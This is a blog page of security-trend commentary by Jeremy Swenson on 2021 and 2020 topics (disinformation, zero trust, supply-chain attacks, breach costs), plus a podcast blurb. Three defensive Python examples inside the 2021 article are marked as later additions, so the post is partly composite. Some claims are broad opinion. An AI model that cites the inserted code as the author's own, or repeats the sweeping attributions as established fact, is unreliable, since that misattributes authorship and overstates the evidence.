Five Cyber-Tech Trends of 2021 and What it Means for 2022.

Minneapolis 01/08/22

By Jeremy Swenson

Intro:

Every year I like to research and commentate on the most impactful security technology and business happenings from the prior year. This year is unique since the pandemic and mass resignation/gig economy continues to be a large part of the catalyst for most of these trends. All these trends are likely to significantly impact small businesses, government, education, high tech, and large enterprise in big and small ways.

Fig. 1. Facebook Whistle Blower and Disinformation Mashup (Getty & Stock Mashup, 2021).

Summary:

The pandemic continues to be a big part of the catalyst for digital transformation in tech automation, identity and access management (IAM), big data, collaboration tools, artificial intelligence (AI), and increasingly the supply chain. Disinformation efforts morphed and grew last year, challenging data and culture. This requires us to put more attention on knowing and monitoring our own social media baselines. We no longer have the same office due to mass work from home (WFH) and the mass resignation/gig economy. This implies increased automated zero-trust policies and tools for IAM, with less physical badge access required. The security perimeter is now more defined by data analytics than physical/digital boundaries.

The importance of supply chain cyber security was elevated by the Biden Administration’s Executive Order 14017 in response to hacks including SolarWinds and Colonial Pipeline. Education and awareness around the review and removal of non-essential mobile apps grows as a top priority as mobile apps multiply. All the while, data breaches and ransomware reach an all-time high while costing more to mitigate.

1) Disinformation Efforts Accelerate Challenging Data and Culture:

Disinformation did not slow down in 2021 due to sustained advancements in communications technologies, the growth of large social media networks, and the “appification” of everything, all of which increase the ease and capability of disinformation. Disinformation is defined as incorrect information intended to mislead or disrupt, especially propaganda issued by a government organization to a rival power or the media. For example, governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies, and control public opinion (Shelly Banjo; Bloomberg, 05/18/2019).

Today’s disinformation war is largely digital via platforms like Facebook, Twitter, Instagram, Reddit, WhatsApp, Yelp, TikTok, SMS text messages, and many other lesser-known apps. Yet even state-sponsored and private news organizations are increasingly the weapon of choice, creating a false sense of validity. Undeniably, the battlefield is wherever many followers reside.

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace and stop it. Further complicating this phenomenon is the number of app-to-app permissions. For example, the CNN and Twitter apps may have permission to post to Facebook, Facebook may have permission to post to WordPress, and WordPress may post to Reddit, or any combination like this. Not only does this make it hard to identify the chain of custody and original source, but it also weakens privacy and security due to the many authentication permissions involved. The copied data is duplicated at each of these layers, which is an additional consideration.
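To make the chain-of-custody problem concrete, here is an added example (not code from the original article) that models app-to-app posting grants as a directed graph and asks, for content seen on one platform, which apps could have originated it and by how many distinct grant chains. The grants listed are constructed for illustration and do not describe any real app's permissions.

```python
"""Added example: app-to-app permission grants as a propagation graph.

Each grant "A may post into B" is one authentication permission and one
more layer at which the content is duplicated. The grants below are
constructed for illustration only.
"""
from collections import deque

# Constructed grants: (source app, destination app it may post into).
PERMISSION_GRANTS = [
    ("CNN", "Facebook"),
    ("Twitter", "Facebook"),
    ("Facebook", "WordPress"),
    ("WordPress", "Reddit"),
    ("Twitter", "WordPress"),
]


def build_graph(grants):
    """Adjacency sets; every app appears as a key even if it grants nothing."""
    graph = {}
    for src, dst in grants:
        graph.setdefault(src, set()).add(dst)
        graph.setdefault(dst, set())
    return graph


def reachable_platforms(graph, origin):
    """All platforms a post from `origin` can end up on via granted permissions."""
    seen = set()
    queue = deque([origin])
    while queue:
        node = queue.popleft()
        for nxt in graph.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def propagation_paths(graph, origin, target):
    """Every distinct, cycle-free grant chain from origin to target."""
    paths = []

    def walk(node, path):
        if node == target:
            paths.append(list(path))
            return
        for nxt in graph.get(node, ()):
            if nxt not in path:  # do not loop through an app twice
                path.append(nxt)
                walk(nxt, path)
                path.pop()

    walk(origin, [origin])
    return paths


def possible_origins(graph, platform):
    """Apps whose grants can ultimately place content on `platform`."""
    return {app for app in graph
            if app != platform and platform in reachable_platforms(graph, app)}


def custody_ambiguity(graph, platform):
    """For content seen on `platform`: candidate origin -> number of grant chains.

    More candidates and more chains means a weaker chain of custody and more
    authentication grants (and copies) to review.
    """
    return {app: len(propagation_paths(graph, app, platform))
            for app in possible_origins(graph, platform)}


if __name__ == "__main__":
    g = build_graph(PERMISSION_GRANTS)
    print("A CNN post can reach:", sorted(reachable_platforms(g, "CNN")))
    print("Content on Reddit could have come from:", custody_ambiguity(g, "Reddit"))
```

Running it shows that a post appearing on Reddit has four candidate origins and that a Twitter post has two separate routes there, which is exactly the ambiguity the paragraph describes. A defender can run the same reachability over an organization's own list of connected-app grants to see which grants to revoke first.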

We all know that false news spreads faster than real news most of the time, largely because it is sensationalized. Since most disinformation draws in viewers, which drives clicks and ad revenues, it is a money-making machine. If you can significantly control what’s trending in the news and/or social media, it impacts how many people will believe it. This in turn impacts how many people will act on that belief, good or bad. This is exacerbated when combined with human bias or irrational emotion. For example, in late 2021 there were many cases of fake COVID-19 vaccines being offered in response to human fear (FDA; 09/28/2021). This negatively impacts culture by setting a misguided example of what is acceptable.

There were several widely reported cases of political disinformation in 2021, including misleading texts, e-mails, mailers, Facebook censorship, and robocalls designed to confuse American voters amid the already stressful pandemic. Like a narcissist’s triangulation trap, these disinformation bursts riled political opponents on both sides in all states, creating miscommunication, ad hominem attacks, and even derailed careers with impacts into the future (PBS; The Hinckley Report, 11/24/20 and Daniel Funke; USA Today, 12/23/21).

Facebook is significantly involved in disinformation as one recent study stated, “Globally, Facebook made the wrong decision for 83 percent of those ads that had not been declared as political by their advertisers and that Facebook or the researchers deemed political. Facebook both overcounted and undercounted political ads in this group” (New York University; Cybersecurity For Democracy, 2021). Of course, Facebook disinformation whistleblower Frances Haugen who testified before Congress in 2021 is only more evidence of these and related Facebook failings. Specifically that “Facebook executives, including CEO Mark Zuckerberg, misstated and omitted key details about what was known about Facebook and Instagram’s ability to cause harm” (Bobby Allyn; NPR, 10/05/21).

Fig. 2. Facebook Gaps in Ad Transparency (IMEC-DistriNet KU Leuven and NYU Cyber Security for Democracy, 2021).

With the help of Facebook’s misinformation, huge swaths of confused voters and activists aligned more with speculation and emotion/hype than unbiased facts, and/or projected themselves as fake commentators. This dirtied the data in terms of the election process and only begs the question: which parts of the election information process are broken? This normalizes petty policy fights, emotional reasoning, and a lack of unbiased intellectualism, negatively impacting western culture. All to the threat actor’s delight. Increased public-to-private partnerships, more educational rigor, and enhanced privacy protections for election and voter data are needed to combat this disinformation.

2) Identity and Access Management (IAM) Scrutiny Drives Zero Trust Orchestration:

The pandemic and mass resignation/gig economy have pushed most organizations to a mass work from home (WFH) posture. Generally, this improves productivity, making it likely to become the new norm, albeit with new rules and controls. To support this, 51% of business leaders started speeding up the deployment of zero trust capabilities in 2020 (Andrew Conway; Microsoft, 08/19/20), and there is no evidence to suggest this is slowing down in the next year; rather, it is likely increasing to support zero trust orchestration. Orchestration is enhanced automation between partner zero trust applications and data, while leaving next to no blind spots. This reduces risk and increases visibility and infrastructure control in an agile way. The quantified benefit of deploying mature zero trust capabilities, including orchestration, is on average $1.76 million less in breach response costs when compared to an organization that has not rolled out zero trust capabilities (IBM Security, Cost of A Data Breach Report, 2021).

Fig. 3. Zero Trust Components to Orchestration (Microsoft, 09/17/21).

Zero trust moves organizations to a need-to-know-only access mindset with inherent deny rules, all the while assuming you are compromised. This implies single sign-on at the personal device level and improved multifactor authentication. It also implies better role-based access controls (RBAC), firewalled networks, improved need-to-know policies, effective whitelisting and blacklisting of apps, group membership reviews, and state of the art PAM (privileged access management) tools for the next year. In the future more of this is likely to better automate and orchestrate (Fig. 3.) zero trust abilities so that one part does not hinder another part via complexity fog.
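The paragraph's "inherent deny rules" and "group membership reviews" are easier to see in code. The following is an added example, not the article's own code or any vendor's product: a default-deny access decision that requires MFA, device health, and an explicit RBAC grant before allowing anything, plus a membership review that flags unknown roles and users whose combined roles give write access across more than one sensitive resource. The roles, resources, users and sessions are constructed placeholders.

```python
"""Added example: default-deny access decision and role membership review.

Everything not explicitly granted is denied, and each check is evaluated
as if the session could already be compromised. Roles, resources and
sessions below are constructed for illustration.
"""
from dataclasses import dataclass

# Constructed role -> set of (resource, action) grants. Anything absent is denied.
ROLE_GRANTS = {
    "hr-analyst": {("hr-db", "read")},
    "hr-admin": {("hr-db", "read"), ("hr-db", "write")},
    "payroll": {("payroll-db", "read"), ("payroll-db", "write")},
}


@dataclass
class Session:
    user: str
    roles: set
    mfa_verified: bool     # strong authentication completed for this session
    device_healthy: bool   # device posture check (patched, managed, not jailbroken)
    resource: str
    action: str


def decide(session, role_grants=ROLE_GRANTS):
    """Return (allowed, reason). Deny is the default; every check must pass."""
    if not session.mfa_verified:
        return False, "mfa required"
    if not session.device_healthy:
        return False, "device posture failed"
    for role in sorted(session.roles):
        if (session.resource, session.action) in role_grants.get(role, set()):
            return True, f"granted by role {role}"
    return False, "no role grants this action"


def review_memberships(user_roles, role_grants=ROLE_GRANTS):
    """Periodic group membership review.

    Flags roles that no longer exist in the policy and users whose roles
    combine to give write access on more than one sensitive resource.
    Returns a list of (user, finding) tuples.
    """
    findings = []
    for user, roles in user_roles.items():
        write_targets = set()
        for role in sorted(roles):
            if role not in role_grants:
                findings.append((user, f"unknown role {role}"))
                continue
            write_targets |= {res for res, act in role_grants[role] if act == "write"}
        if len(write_targets) > 1:
            findings.append((user, "write access across " + ", ".join(sorted(write_targets))))
    return findings


if __name__ == "__main__":
    print(decide(Session("ann", {"hr-analyst"}, True, True, "hr-db", "read")))
    print(decide(Session("ann", {"hr-analyst"}, True, True, "hr-db", "write")))
    print(review_memberships({"bob": {"hr-admin", "payroll"}, "cat": {"ghost"}}))
```

The order of checks matters: authentication and device posture are evaluated before any role lookup, so a stolen session on an unhealthy device is denied even when the role would otherwise allow the action. In a real deployment the same decision function would sit behind the SSO or PAM layer rather than in application code.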

3) Security Perimeter is Now More Defined by Data Analytics than Physical/Digital Boundaries:

This increased WFH posture blurs the security perimeter physically and digitally. New IP addresses, internet volume, routing, geolocation, and virtual machines (VMs) exacerbate this blur. This raises the criticality of good data analytics and dashboarding to define the digital boundaries in real-time. Therefore, prior audits, security controls, and policies may be ineffective. For instance, empty corporate offices are the physical byproduct of mass WFH, requiring organizations to set default disable for badge access. Extra security in or near server rooms is also required. The pandemic has also made vendor interactions more digital, so digital vendor connection points should be reduced and monitored in real-time, and the related exception policies should be re-evaluated.

New data lakes and machine learning informed patterns can better define security perimeter baselines. One example of this is knowing what percent of your remote workforce is on which internet providers and of what type, for example Google Fiber, Comcast cable, CenturyLink DSL, AT&T 5G, etc. Only certain modems work with each of these networks, and that leaves a data trail, although the router behind the modem could be of any type. What type of device they connect with (Mac, Apple mobile, Windows, VM, or other) and whether it is healthy can all be determined in relation to security perimeter analytics.
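As an added example of the baseline analytics described here (this is illustrative code, not from the article or any product), the script below takes VPN session records carrying provider, access type, device type and a health flag, answers the "what percent is on which provider" question, learns a per-user baseline of provider/access/device combinations, and flags later sessions that fall outside that baseline. All session records are constructed; the provider names are the ones mentioned in the paragraph and are used only as labels.

```python
"""Added example: remote-workforce perimeter baseline from VPN session records.

Records are constructed tuples of (user, isp, access_type, device, healthy).
A real pipeline would pull these from VPN/SSO logs and a device-health feed.
"""
from collections import Counter

# Constructed learning-window sessions (what the workforce normally looks like).
BASELINE_SESSIONS = [
    ("alice", "Comcast", "cable", "Windows", True),
    ("bob", "CenturyLink", "DSL", "Apple", True),
    ("carol", "Google Fiber", "fiber", "Windows", True),
    ("dave", "Comcast", "cable", "Windows", True),
    ("erin", "AT&T", "5G", "Apple", True),
    ("frank", "Comcast", "cable", "VM", True),
]


def isp_mix(sessions):
    """Percent of sessions per (isp, access type): the workforce provider profile."""
    counts = Counter((isp, kind) for _, isp, kind, _, _ in sessions)
    total = sum(counts.values())
    return {key: round(100 * n / total, 1) for key, n in counts.items()}


def build_baseline(sessions):
    """Per-user set of (isp, access type, device) combinations seen so far."""
    baseline = {}
    for user, isp, kind, device, _ in sessions:
        baseline.setdefault(user, set()).add((isp, kind, device))
    return baseline


def flag_session(baseline, session, known_isps):
    """Reasons a session deviates from the baseline; empty list means in-profile."""
    user, isp, kind, device, healthy = session
    reasons = []
    if not healthy:
        reasons.append("device failed health check")
    if isp not in known_isps:
        reasons.append(f"ISP {isp} never seen in workforce baseline")
    if user not in baseline:
        reasons.append("user has no baseline")
    elif (isp, kind, device) not in baseline[user]:
        reasons.append("new isp/access/device combination for user")
    return reasons


def triage(baseline_sessions, new_sessions):
    """Map each new session's user to its deviation reasons (one session per user)."""
    baseline = build_baseline(baseline_sessions)
    known_isps = {isp for _, isp, _, _, _ in baseline_sessions}
    return {s[0]: flag_session(baseline, s, known_isps) for s in new_sessions}


if __name__ == "__main__":
    print(isp_mix(BASELINE_SESSIONS))
    new = [
        ("alice", "Comcast", "cable", "Windows", True),       # in profile
        ("bob", "UnknownNet", "cable", "Apple", True),         # new provider and combo
        ("frank", "Comcast", "cable", "VM", False),            # same combo, unhealthy
    ]
    for user, reasons in triage(BASELINE_SESSIONS, new).items():
        print(user, reasons or "ok")
```

A deviation is a dashboard signal, not a verdict: a user on a new provider may simply have moved, so the flagged sessions feed a review queue or a step-up authentication rule rather than an automatic block. The same structure extends to geolocation or modem vendor fields once those are available in the logs.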

4) Supply Chain Risk and Attacks Increase Prompting Government Action:

Every organization has a supply chain big or small. There are even subcomponents of the supply chain that can be hard to see like third/fourth-party vendors. A supply chain attack works by targeting a third/fourth party with access to an organization’s systems instead of hacking their networks directly.

In 2021 cybercriminals focused their surveillance on key components of the supply chain, including hacking DNS servers, switches, routers, VPN concentrators and services, and other supply chain connected components at the vendor level. Of note was the massive Colonial Gas Pipeline hack that spiked fuel prices this last summer. This was caused by one compromised VPN account, informed by a leaked password from the dark web (Turton, William; and Mehrotra, Kartikay; Bloomberg, 06/04/21). The SolarWinds hack was another supply chain-originated attack, in that the attackers got into SolarWinds’ IT management product Orion, which in turn got them into the networks of most of the customers of that product (Lily Hay Newman; Wired, 12/19/21). The research consensus unsurprisingly ties this attack to Russian affiliated threat actors, and there is no evidence contradicting that.

In response to these and related attacks the U.S. Presidential Administration issued Executive Order 14017, the heart of which requires those who manufacture and distribute software to develop a new awareness of their supply chain, including what is in their products, even open-source software (White House; 05/12/21). This is in addition to more spending on CISA hiring and public relations efforts for vulnerabilities and NIST framework conformance. Time will tell what this order delivers, as it is dependent on what private sector players do.

Fig. 4. Supply Chain Cyber Attack Diagram (INSURETrust, 2021).

5) Data Breaches Have Greatly Increased in Number and Cost:

The pandemic has continued to be a part of the catalyst for increased lawlessness, including fraud, ransomware, data theft, and other types of profitable hacking. Cybercriminals are more aggressively taking advantage of geopolitical conflict and legal standing gaps. For example, almost all hacking operations are in countries that do not have friendly geopolitical relations with the United States or its allies, and all their many proxy hops stay consistent with this. These proxy hops are how they hide their true location and identity.

Moreover, with local police departments extremely overworked and understaffed, with their number one priority being responding to the huge uptick in violent crime in most major cities, white-collar cybercrimes remain a low priority. Additionally, local police departments have few cyber response capabilities, depending on the size of their precinct. Often, they must sheepishly defer to the FBI, CISA, and the Secret Service, or their delegates, for help. Yet not surprisingly, there is a backlog for that as well, with preference going to large companies of national concern that fall clearly into one of the 16 critical infrastructure sectors. That is, if turf fights and bureaucratic roadblocks don’t make things worse. Thus, many mid and small-sized businesses are left in the cold to fend for themselves, which often results in them paying the ransom and then being a victim a second time, all the while their insurance carrier drops them.

Further complicating this is a lack of clarity on data breach and business interruption insurance coverage and terms. Keep in mind most general business liability insurance policies and terms were drafted before hacking was invented, so they are by default behind the technology. Most often, general liability business insurance covers bodily injuries and property damage resulting from your products, services, or operations. Please see my related article 10 Things IT Executives Must Know About Cyber Insurance to understand incident response and to reduce the risk of inadequate coverage and/or claims denials.

According to the Identity Theft Resource Center (ITRC)’s Q3 2021 Data Breach Report, there was a 17% year-over-year increase as of 09/30/21. This means that by the time they finish their Q4 2021 report it’s likely to be above a 30% year-over-year increase. Breaches are also more costly for the organizations suffering them, according to the IBM Security Cost of a Data Breach Report (Fig. 5).

Fig 5. Cost of A Data Breach Increases 2020 to 2021 (IBM Security, 2021).

From 2020 to 2021 the average cost of a data breach in U.S. dollars rose to $4.24 million from $3.86 million, a 9.1% increase, almost 10%. In contrast, the preceding 4 years were relatively flat (Fig. 5). The pandemic and policing conundrum is a considerable part of this uptick.

Lastly, this is a lot of money for an organization to spend on a breach. Yet this amount could be higher when you factor in other long-term consequence costs such as increased risk of a second breach, brand damage, and/or delayed regulatory penalties that were below the surface, all of which differ by industry. In sum, it is cheaper and more risk prudent to spend even $4.24 million, or a relative percentage at your organization, on preventative zero trust capabilities than to deal with the cluster of a data breach.

Take-Aways:

COVID-19 remains a catalyst for digital transformation in tech automation, IAM, big data, collaboration tools, and AI. We no longer have the same office and thus less badge access is needed. The growth and acceptability of mass WFH combined with the mass resignation/gig economy remind employers that great pay and culture alone are not enough to keep top talent. Signing bonuses and personalized treatment are likely needed. Single sign-on (SSO) will expand to personal devices and smartphones/watches. Geolocation-based authentication is here to stay with double biometrics likely. The security perimeter is now more defined by data analytics than physical/digital boundaries, and we should dashboard this with machine learning and AI tools.

Education and awareness around the review and removal of non-essential mobile apps is a top priority, especially for mobile devices used separately or jointly for work purposes. This requires a better understanding of geolocation, QR code scanning, couponing, digital signage, in-text ads, micropayments, Bluetooth, geofencing, e-readers, HTML5, etc. A bring your own device (BYOD) policy needs to be written, followed, and updated often, informed by need-to-know and role-based access (RBAC) principles. Organizations should consider forming a mobile ecosystem security committee to make sure this unique risk is not overlooked or overly merged with traditional web/IT risk. Mapping the mobile ecosystem components in detail is a must.

IT and security professionals need to realize that alleviating disinformation is about security before politics. We should not be afraid to talk about it, because if we are then our organizations will stay weak and insecure and we will be plied by the same political bias that we fear confronting. As security professionals, we are patriots and defenders of wherever we live and work. We need to know what our social media baseline is across platforms. More social media training is needed, as many security professionals still think it is mostly an external marketing thing. Public-to-private partnerships need to improve and app-to-app permissions need to be scrutinized. Enhanced privacy protections for election and voter data are needed. Everyone does not need to be a journalist, but everyone can have the common sense to identify malware-inspired fake news. We must report undue bias in big tech from an IT, compliance, media, and security perspective.

Cloud infrastructure will continue to grow fast, creating perimeter and compliance complexity/fog. Organizations should preconfigure cloud-scale options and spend more on cloud-trained staff. They should also make sure that they are selecting more than two or three cloud providers, all separate from one another. This helps staff get cross-trained on different cloud platforms and add-ons. It also mitigates risk and makes vendors bid more competitively.

The increase in the number and cost of data breaches was in part attributed to vulnerabilities in supply chains in a few national data breach incidents in 2021. Part of this was addressed in President Biden’s Executive Order 14017 on supply chain security. This reminds us to replace outdated routers, switches, repeaters, and controllers, and to patch them immediately. It also reminds us to separate and limit network vendor access points to strictly what is needed and for a limited time window. Last but not least, we must have up-to-date, thorough business interruption / cyber insurance with detailed knowledge of what it requires for incident response, with breach vendors pre-selected.

About the Author:

Jeremy Swenson is a disruptive thinking security entrepreneur, futurist/researcher, and senior management tech risk consultant. Over 17 years he has held progressive roles at many banks, insurance companies, retailers, healthcare orgs, and even governments, including being a member of the Federal Reserve Secure Payment Task Force. Organizations relish his ability to bridge gaps and flesh out hidden risk management solutions while at the same time improving processes. He is a frequent speaker, published writer, podcaster, and even does some pro bono consulting in these areas. As a futurist, his writings on digital currency, the Target data breach, and Google combining Google+ video chat with Google Hangouts video chat have been validated by many. He holds an MBA from St. Mary’s University of MN, a MSST (Master of Science in Security Technologies) degree from the University of Minnesota, and a BA in political science from the University of Wisconsin Eau Claire.

Seven Impactful Cyber-Tech Trends of 2020 and What it Means for 2021.

Every year I like to research and commentate on the most impactful security technology and business happenings from the prior year. This year is unique since the pandemic is partly the catalyst for most of these trends in conjunction with it being a presidential election year like no other. All these trends are likely to significantly impact small businesses, government, education, high tech, and large enterprise in big and small ways.

Fig 1. Stock Mashup, 2020.

1) Disinformation Efforts Accelerate Challenging Data and Culture:

Advancements in communications technologies, the growth of large social media networks, and the “appification” of everything increase the ease and capability of disinformation. Disinformation is defined as incorrect information intended to mislead or disrupt, especially propaganda issued by a government organization to a rival power or the media. For example, governments creating digital hate mobs to smear key activists or journalists, suppress dissent, undermine political opponents, spread lies, and control public opinion (Shelly Banjo, Bloomberg, 05/18/2019). Today’s disinformation war is largely digital via platforms like Facebook, Twitter, iTunes, WhatsApp, Yelp, and Instagram. Yet even state-sponsored and private news organizations are increasingly the weapon of choice, creating a false sense of validity. Undeniably, the battlefield is wherever many followers reside.

Bots and botnets are often behind the spread of disinformation, complicating efforts to trace it and to stop it. Further complicating this phenomenon is the number of app-to-app permissions. For example, the CNN and Twitter apps may have permission to post to Facebook, Facebook may have permission to post to WordPress, and WordPress may post to Reddit, or any combination like this. Not only does this make it hard to identify the chain of custody and source, but it also weakens privacy and security due to the many authentication permissions.

We all know that false news spreads faster than real news most of the time, largely because it is sensationalized. Since disinformation draws in viewers, which drives clicks and ad revenues, it is a money-making machine. If you can control what’s trending in the news and/or social media, it impacts how many people will believe it. This in turn impacts how many people will act on that belief, good or bad. This is exacerbated when combined with human bias or irrational emotion. For example, in late 2020 there were many cases of fake COVID-19 vaccines being offered in response to human fear (FDA, 12/22/2020). This negatively impacts culture by setting a misguided example of what is acceptable.

There were several widely reported cases of political disinformation in 2020, including misleading texts, e-mails, mailers, and robocalls designed to confuse American voters amid the already stressful pandemic. Like a narcissist’s triangulation trap, these disinformation bursts riled political opponents on both sides in all states, creating miscommunication, ad hominem attacks, and even derailed careers (PBS, The Hinckley Report, 11/24/20). Moreover, huge swaths of confused voters aligned more with speculation and emotion/hype than unbiased facts. This dirtied the data in terms of the election process and only begs the question of which parts of the election information process are broken. This normalizes petty policy fights, emotional reasoning, and a lack of unbiased intellectualism, negatively impacting western culture. All to the threat actor’s delight. Increased public-to-private partnerships, more educational rigor, and enhanced privacy protections for election and voter data are needed to combat this disinformation.

2) Stalkerware Grows and Evolves Reducing Mobile Privacy:

The increased use of mobile devices, in conjunction with the pandemic-induced work from home (WFH) growth, has produced more stalkerware. According to one report, there was a 51% increase in Android spyware and stalkerware from March through June vs. the first two months of the year (Avast, Security Boulevard, 12/02/20), and this is likely to be above a 100% increase when all data is tabulated for the end of 2020. Inspired by covert law enforcement investigation tactics, this malware variant can be secretly installed on a victim’s phone, hiding as a seemingly harmless app. It is not that different from employee monitoring software, which can easily be confused with this malware. However, stalkerware is typically installed by fake friends, jealous spouses and partners, ex-partners, and even concerned relatives. If successfully installed, it relays private information back to the attacker, including the victim’s photos, location, texts, web browsing history, call records and more. This is where the privacy violation and abuse and/or fraud can start, yet it is hard to identify in the blur of too many mobile apps.

3) Identity & Access Management (IAM) Scrutiny Drives Zero Trust:

The pandemic has pushed most organizations to a mass WFH posture. Generally, this improves productivity, making it likely to become the new norm, albeit with new rules and controls. To support this, 51% of business leaders are speeding up the deployment of Zero Trust capabilities (Andrew Conway, Microsoft, 08/19/20). Zero trust moves organizations to a need-to-know-only access mindset with inherent deny rules, all the while assuming you are compromised. This implies single sign-on at the personal device level and improved multifactor authentication. It also implies better role-based access controls (RBAC), improved need-to-know policies, group membership reviews, and state of the art PAM tools for the next year.

4) Security Perimeter is Now More Defined by Data Analytics than Physical/Digital Boundaries:

This increased WFH posture blurs the security perimeter both physically and digitally. New IP addresses, internet volume, routing, geolocation, and virtual machines (VMs) exacerbate this blur. This raises the criticality of good data analytics and dashboarding to define the digital boundaries in real-time. Therefore, prior audits, security controls, and policies may be ineffective. For instance, empty corporate offices are the physical byproduct of mass WFH, requiring organizations to set default disable for badge access. Extra security in or near server rooms is also required. The pandemic has also made vendor interactions more digital, so digital vendor connection points should be reduced and monitored in real-time, and the related exception policies should be re-evaluated.

5) Data Governance Gets Sloppy Amid Agility:

Mass WFH has increased agility and driven sloppy data governance. For example, one week after the CARES Act was passed, banks were asked to accept Paycheck Protection Program (PPP) loan applications. Many banks were unprepared to deal with the flood of data from digital applications, financial histories, and related docs, and were not able to process them in an efficient way. Moreover, the easing of regulatory red tape at hospitals/clinics, although well-intentioned to make emergency response faster, created sloppy data governance as well. The irony of this is that regulators are unlikely to give either of these industries a break, nor will civil attorneys hungry for any hangnail claim.

6) The Divide Between Good and Bad Cloud Security Grows:

The pandemic has reminded us that there are two camps with cloud security: those who have a planned option for bigger cloud-scale and those that are burning their feet in a hasty rush to get there. In the first option, the infrastructure is preconfigured and hardened, rates are locked, and there is less complexity, all of which improves compliance and gives tech risk leaders more peace of mind. In the latter, the infrastructure is less clear, rates are not predetermined, compliance and integration are confusing at best, and costs run high, all of which could set such poorly configured cloud infrastructures up for future disasters.

7) Phishing Attacks Grow Exponentially and Get Craftier:

The pandemic has caused a hurricane of phishing emails that have been hard to keep up with. According to KnowBe4 and Security Magazine, there has been a 6,000% increase in phishing e-mails since the start of the pandemic (Stu Sjouwerman, KnowBe4, 07/13/20 & Security Magazine, 07/22/20). Many of these e-mails have improved their approach and design, appearing more professional and appealing to our emotions by using tags concerning COVID relief, data, and vaccines. Ransomware increased 72% year over year (Security Magazine, 07/22/20). With many new complexities in the mobile ecosystem and exponential app growth, it is not surprising that mobile vulnerabilities also increased by 50% (Security Magazine, 07/22/20).

Take-Aways:

COVID-19 is the catalyst for digital transformation in tech automation, IAM, big data, collaboration tools, and AI. We no longer have the same office and thus less badge access is needed. Single sign-on (SSO) will expand to personal devices and smartphones/watches. Geolocation-based authentication is here to stay, with double biometrics likely. The security perimeter is now more defined by data analytics than physical/digital boundaries, and we should dashboard this with machine learning and AI tools.

Education and awareness around the review and removal of non-essential mobile apps is a top priority, especially for mobile devices used separately or jointly for work purposes. This requires a better understanding of geolocation, QR code scanning, couponing, digital signage, in-text ads, micropayments, Bluetooth, geofencing, e-readers, HTML5, etc. A bring your own device (BYOD) policy needs to be written, followed and updated often, embracing need-to-know and role-based access (RBAC) principles. Organizations should consider forming a mobile ecosystem security committee to make sure this unique risk is not overlooked or overly merged with traditional web/IT risk. Mapping the mobile ecosystem components in detail is a must.

Cloud infrastructure will continue to grow fast, creating perimeter and compliance complexity/fog. Organizations should preconfigure cloud-scale options and spend more on cloud-trained staff. They should also make sure that they are selecting more than two or three cloud providers, all separate from one another. This helps staff get cross-trained on different cloud platforms and add-ons. It also mitigates risk and makes vendors bid more competitively.

IT and security professionals need to realize that alleviating disinformation is about security before politics. We should not be afraid to talk about it, because if we are then our organizations will stay weak and insecure and we will be plied by the same political bias that we fear confronting. As security professionals, we are patriots and defenders of wherever we live and work. We need to know what our social media baseline is across platforms. More social media training is needed, as many security professionals still think it is mostly an external marketing thing. Public-to-private partnerships need to improve and app-to-app permissions need to be scrutinized. Enhanced privacy protections for election and voter data are needed. Everyone does not need to be a journalist, but everyone can have the common sense to identify malware-inspired fake news. We must report undue bias in big tech from an IT, compliance, media, and security perspective.

About the Author:

Jeremy Swenson is a disruptive thinking security entrepreneur and senior management tech risk consultant. Over 15 years he has held progressive roles at many banks, insurance companies, retailers, healthcare orgs, and even governments. Organizations relish his ability to bridge gaps and flesh out hidden risk management solutions while at the same time improving processes. He is also a frequent speaker, published writer, and even does some pro bono consulting in these areas. He holds an MBA from St. Mary’s University of MN and an MSST (Master of Science in Security Technologies) degree from the University of Minnesota.

Abstract Forward Podcast #10: CISO Risk Management and Threat Modeling Best Practices with Donald Malloy and Nathaniel Engelsen!

Fig. 1. Joe the IT Guy, 10/17/2018

Featuring the esteemed technology and risk thought leaders Donald Malloy and Nathaniel Engelsen — this episode covers threat modeling methodologies STRIDE, Attack Tree, VAST, and PASTA. Specifically, how to apply them with limited budgets. It also discusses the complex intersection of how to derive ROI on threat modeling with compliance and insurance considerations. We then cover IAM best practices including group and role level policy and control best practices. Lastly, we hear a few great examples of key CISO risk management must-dos at the big and small company levels.

Fig. 2. PASTA Threat Modeling Steps (Nataliya Shevchenko, CMU, 12/03/2018).

Donald Malloy has more than 25 years of experience in the security and payment industry and is currently a security technology consultant advising many companies. Malloy was responsible for developing the online authentication product line while at NagraID Security (Oberthur), and prior to that he was Business Development and Marketing Manager for Secure Smart Card ICs at both Philips Semiconductors (NXP) and Infineon Technologies. Malloy originally comes from Boston, where he was educated; he holds M.S.-level degrees in Organic Chemistry and an M.B.A. in Marketing. Presently he is Chairman of The Initiative for Open Authentication (OATH) and a solution provider with DualAuth. OATH is an industry alliance that has moved the authentication market from proprietary systems to an open, standards-based architecture promoting ubiquitous strong authentication, used by most companies today. DualAuth is a global leader in trusted security with two-factor authentication, including auto passwords. He resides in southern California and in his spare time enjoys hiking, kayaking, and traveling around this beautiful world.

Nathaniel Engelsen is a technology executive, agilist, writer, and speaker on topics including DevOps, agile team transformation, and cloud infrastructure and security. Over the past 20 years he has worked for startups, small and mid-size organizations, and $1B+ enterprises in industries as varied as consulting, gaming, healthcare, retail, transportation logistics, and digital marketing. Nathaniel’s current security venture is Callback Security, providing dynamic access control mechanisms that let companies turn off well-known or static remote and database access routes. Nathaniel has a bachelor’s in Management Information Systems from Rowan University and an MBA from the University of Minnesota, where he was a Carlson Scholar. He also holds a CISSP.

The podcast can be heard here.

More information on Abstract Forward Consulting can be found here.

Disclaimer: This podcast does not represent the views of former or current employers and/or clients. This podcast will make every reasonable effort to verify facts and inferences therefrom. However, this podcast is intended to entertain and significantly inform its audience based on subjective reason-based opinions. Non-public information will not be disclosed. Information obtained in this podcast may be materially out of date at or after the time of the podcast. This podcast is not legal, accounting, audit, health, technical, or financial advice. © Abstract Forward Consulting, LLC.

8 Effective Third-Party Risk Management Tactics

In this increasingly complex security landscape, with threat actors and vendors changing their tools rapidly, managing third-party risk is difficult and ambiguous, and knowing how to prioritize mitigation spend is harder still.

Fig 1. Risk, Stock Image, 2019.

The key to any vendor risk management program or framework is measurement, repeatability, and learning from (and improving) what was repeated as the business and its risks change. These are eight best practices you can follow to assess your vendors’ security processes and their willingness to understand your risks and mitigate them together with you.

1) Identify All Your Vendors / Business Associates:

Many companies miss this easy step. Use RBAC (role-based access controls) when applicable – windows groups or the like. Creating a repeatable, written, compliance process for identifying them and making updates to the list as vendors move in and out of the company is worthwhile.

